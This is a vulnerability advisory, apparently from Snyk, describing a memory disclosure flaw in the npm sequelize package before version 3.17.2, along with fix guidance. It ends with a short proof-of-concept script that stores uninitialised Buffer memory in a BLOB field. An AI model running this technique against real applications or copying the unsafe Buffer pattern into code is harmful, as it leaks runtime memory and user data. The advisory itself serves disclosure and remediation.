Remote Memory Exposure Affecting sequelize package, versions <3.17.2



    Attack Complexity Low

    Threat Intelligence

    EPSS 0.23% (61st percentile)
Expand this section
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID npm:sequelize:20160115
  • published 1 Apr 2016
  • disclosed 15 Jan 2016
  • credit Unknown

How to fix?

Upgrade sequelize to version >= 3.17.3


A potential memory disclosure vulnerability exists in sequelize versions prior to 3.17.2. A field of type DataTypes.BLOB can be used to expose sensitive information such as code, runtime memory and user data into the database.


sequelize uses the Buffer type to represent DataTypes.BLOB. Initializing a Buffer with integer N creates a Buffer of length N with non zero-ed out memory. Example:

var x = new Buffer(100); // uninitialized Buffer of length 100
// vs
var x = new Buffer('100'); // initialized Buffer with value of '100'

Initializing a BLOB field in such manner will dump uninitialized memory into the database. The patch wraps Buffer field initialization in sequelize by converting a number value N to a string, initializing the Buffer with N in its ascii form.


Proof of concept

var Sequelize = require('sequelize');
var sequelize = new Sequelize('pastebin', null, null,
    { host: '', dialect: 'postgres', });

var Task = sequelize.define('Pastebin', { title: Sequelize.STRING, content: Sequelize.BLOB, });

Task.create({ title: 'title', content: 100, }).then(function (task) { console.log(task.title); console.log(task.content); // will print out 100 bytes of previously used memory });